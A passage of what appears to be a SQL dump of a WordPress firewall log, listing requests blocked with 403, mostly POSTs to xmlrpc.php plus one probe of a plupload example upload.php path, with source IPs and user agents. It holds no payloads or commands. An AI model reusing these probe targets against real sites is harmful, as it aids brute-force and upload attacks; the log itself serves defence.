Safari\\/537.36\"}','bHlPxkcYKjCmgofyei28UQWM',0,1680806064.3628,600,'','POST',403,0,515,0,1,'',0),('213.152.186.40',3583556136,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','N1Lzo3UXtWKQFb6VgaSRjxqZ',0,1680806068.5811,1707,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','lpC8tenNU9AsB2Kj0vMLRZJ5',0,1680806809.1167,638,'','POST',403,0,515,0,1,'',0),('91.200.103.0',1539860224,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','0WRow7AVmi6HyKGsgen2M3uX',0,1680806819.9180,586,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','I3vJUjbTEQeXqZdBki5gtfa9',0,1680806822.2969,1053,'','POST',403,0,515,0,1,'',0),('66.29.156.133',1109236869,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','M9idkzpRElWQBftY6seJZjOG',0,1680806822.7742,932,'','POST',403,0,515,0,1,'',0),('104.225.237.131',1759636867,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','ohqdQADWKUur7gBx42wtYzTJ',0,1680806830.0949,1269,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','XnycEY9s0TWZOJ4H26le8LBw',0,1680806830.3540,1170,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','6v48XisBEKau7cqobtQDrWfI',0,1680806837.0081,666,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','MWN34VDZI671qkcpevbwBFQi',0,1680806842.3101,1260,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','nVDq6d7EpXbQ0IaZPKyjN8xi',0,1680806842.6485,1146,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','0YqsnzKXvMemSRV6I2JiGlBc',0,1680806854.8294,569,'','POST',403,0,515,0,1,'',0),('141.98.102.179',2372036275,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4vAW2tJRY1O0SiPkVuKeGB56',0,1680812592.7823,3643,'','POST',403,0,515,0,1,'',0),('128.127.105.184',2155833784,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9rIpeRyY15k2ESj7ZsDGX3JP',0,1680812897.4459,3840,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KohqXWAvZjGldMgDBOCEiVP0',0,1680813250.0660,3451,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','xqtkjubXDAMWci8nGTBFoaO7',0,1680813254.5394,608,'','POST',403,0,515,0,1,'',0),('185.163.200.46',3114518574,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','LsybkctP8uETvWCepd4hnMRU',0,1680813262.6842,585,'','POST',403,0,515,0,1,'',0),('198.27.98.143',3323683471,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','cLHkpKg9RJY0Vai4MfAtNl2x',0,1680814131.5203,3618,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','6SJqNncItoU8ykdOxp9GXP40',0,1680814137.4753,580,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','p8DeLsChKAScu3wPiRY2lt19',0,1680814138.9914,567,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9QFysfXgoAi8plhGOL4jaqt2',0,1680814146.0791,540,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','gNSxBEptLFc3Y4JzwGyQbsjM',0,1680814147.0770,1634,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','ySwrTvM5nj9Y1XDFa7zuA8eq',0,1680814165.2608,606,'','POST',403,0,515,0,1,'',0),('185.179.82.133',3115537029,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','oftKjAZMIcH4mFOEkVus1Qln',0,1680814176.1127,571,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','wm41WGE5S0onx7FdLK8aqNUy',0,1680814182.8011,608,'','POST',403,0,515,0,1,'',0),('123.56.69.68',2067285316,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ypTaWjhd1eHANrgIU5MLSCQ3',0,1680814183.7566,555,'','POST',403,0,515,0,1,'',0),('188.128.149.108',3162543468,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','mTe9sfxS4CpzlZGgW2nEJDVu',0,1680814475.2140,791,'','POST',403,0,515,0,1,'',0),('209.58.177.202',3510284746,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','hBHUCDatYpoEeQJwbXfd5R6N',0,1680814476.0558,584,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','HWnzVOEvQKpmMSr0Y6BUP2Nk',0,1680814479.6219,573,'','POST',403,0,515,0,1,'',0),('15.206.123.128',265190272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','TYqZ28FanvjmhJGxgKUPl9uV',0,1680814487.1861,1235,'','POST',403,0,515,0,1,'',0),('93.186.120.193',1572501697,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','3JSRyXQFxVHkEnhdurqZiIGU',0,1680814495.2999,1877,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','rzfkhga0ZtxV1bWXDC7LEcK8',0,1680814605.3214,622,'','POST',403,0,515,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mzR6nDBQWawGqpgIJxjXAfYK',0,1680816339.0390,3608,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','5XR8bfkxrYWLHl7VJwuSGMto',0,1680816425.3639,583,'','POST',403,0,515,0,1,'',0),('103.138.150.26',1737135642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','3o4m2pHKygLGjwvXReiOZuCs',0,1680816430.1184,585,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','hIfvSpNPDRYFgxl4WEoe6mn2',0,1680816432.7686,588,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','oGrWJpM2cm6gVYZX3OaFzSvu',0,1680816440.5328,640,'','POST',403,0,515,0,1,'',0),('103.3.1.158',1728250270,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','wD2qSye9gJUGQNZdTta7WAb6',0,1680816449.3210,552,'','POST',403,0,515,0,1,'',0),('86.48.23.13',1445992205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','Gbvydpk5qFfYKxD6uHgWtSN3',0,1680816452.7237,611,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Eg79jkT6AiCHr4lMxnUbD8PN',0,1680816459.5446,569,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Mhv8egREFzBYVjx7JDmNQXIy',0,1680816469.3073,567,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','vjMLgBYFqH0uG3cmSn1dPeob',0,1680816476.2773,573,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bcJqVpHo2FL3GmyrgzviTl4N',0,1680818293.2659,3625,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','lRAGwTq2x6PFda45Bh1gVZms',0,1680818629.8331,4323,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','H4Nal5GBYSTeUrWvioqKPmpR',0,1680818633.0765,2385,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','gYNBv4xk2hCroLRUaGAtJqQE',0,1680818633.2726,2270,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','HinP0TmxWqEtkZ6sI5eQzpoU',0,1680818645.0590,615,'','POST',403,0,515,0,1,'',0),('120.27.216.32',2015090720,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','OQiIB1kGt8FynMP96r3JaLZh',0,1680818653.9739,640,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','g86es3dr0BEML2HclzF9IbTC',0,1680818656.0013,562,'','POST',403,0,515,0,1,'',0),('185.182.57.22',3115727126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','HLeo49ng3Z6CwBuiOplca7If',0,1680818657.9603,556,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XztIq5rTxMe7WhoAm6DjQwLg',0,1680818668.1748,594,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','FlDQkj0o5UGLbqxwO71a9CTV',0,1680818672.2257,609,'','POST',403,0,515,0,1,'',0),('152.67.12.146',2554530962,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','MdCopjxaDS0eZthN6EOPnbk9',0,1680818684.1940,678,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/global/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','ciB6PQuMgGOaY0LIsJFThU2V',0,1680820475.2579,880,'','GET',403,0,700,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','vIzRgbjuxoT3DlBY4cd9KrMZ',0,1680820666.2055,726,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','4Dk1qeRJLlFzcCrWhuoa03Ai',0,1680820667.4538,555,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','CIHiEucg3VhYmj1RratQU0BJ',0,1680820669.6000,546,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','xN123dKVO9AQluf5gqiXcCDI',0,1680820684.8959,560,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','zKq5ADEo2dHFy9tC3MNc6Ber',0,1680820687.2693,590,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','FUZ0gijezGqOTn93HoICv62a',0,1680820690.7356,654,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','FE4XyYaARVQoL1SDPmHb3d6k',0,1680820695.5851,543,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','3uoEPkg8Bp4AmKlsbeqOhWNz',0,1680820701.8569,989,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','KOsFq4gCcj7PVIoaAmdevrkB',0,1680820702.4611,855,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','axf5FLiKC8ENRTrnw2VPcem1',0,1680820708.9858,803,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','kgq8vtXmoY0HAiVUR9DNs6zK',0,1680820709.6397,725,'','POST',403,0,515,0,1,'',0),('103.147.130.161',1737720481,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','k8ds1NjJ0MiylfUrRQ5Xb3Sq',0,1680820720.8350,612,'','POST',403,0,515,0,1,'',0),('184.75.221.43',3091979563,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YqFc6W8pvRAHiwh3EBjUxDTP',0,1680821640.5412,3825,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mqDtcJVYfUzvwoWn4dNkgZL6',0,1680821723.4195,3619,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DsZu6iVx4MbdLv1poAWg0Icl',0,1680822422.1416,5936,'','POST',403,0,515,0,1,'',0),('213.152.161.244',3583549940,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MnwxXJzrptfKs7A3UkNdWEPo',0,1680823990.9990,5565,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2Pcaveuzk37hUtQFwbrNgx8J',0,1680825430.2236,2840,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','lP1dKeMzh8qYSgvsTnAwWfyJ',0,1680825575.3943,679,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','7bUpzWxcRaZsnD1OPmI6iFrh',0,1680825579.6008,552,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','bO8n2cPRTJlUauZprz3t9xkj',0,1680825582.2981,547,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','IJWteczpiSEjG83F19gd7oDK',0,1680825591.0735,1411,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','H06WJey7jFGkU3MvXz14NQqm',0,1680825606.3538,1831,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Pltf7zZT3LFWJm8uXxse5gyI',0,1680825611.4128,622,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','8SFA3LdgJlwvprqk2CUBVG9x',0,1680825620.3227,670,'','POST',403,0,515,0,1,'',0),('77.247.126.152',1308065432,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','ReTh1XG69MZJHzb7C0l5iVYs',0,1680825623.4148,670,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','rOxDXFkAfbMmSe9d7ozQ5YJU',0,1680825626.2148,763,'','POST',403,0,515,0,1,'',0),('129.226.208.121',2179125369,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','pQX1uGJDBPqKgHE9LexfdTM7',0,1680825636.8601,661,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 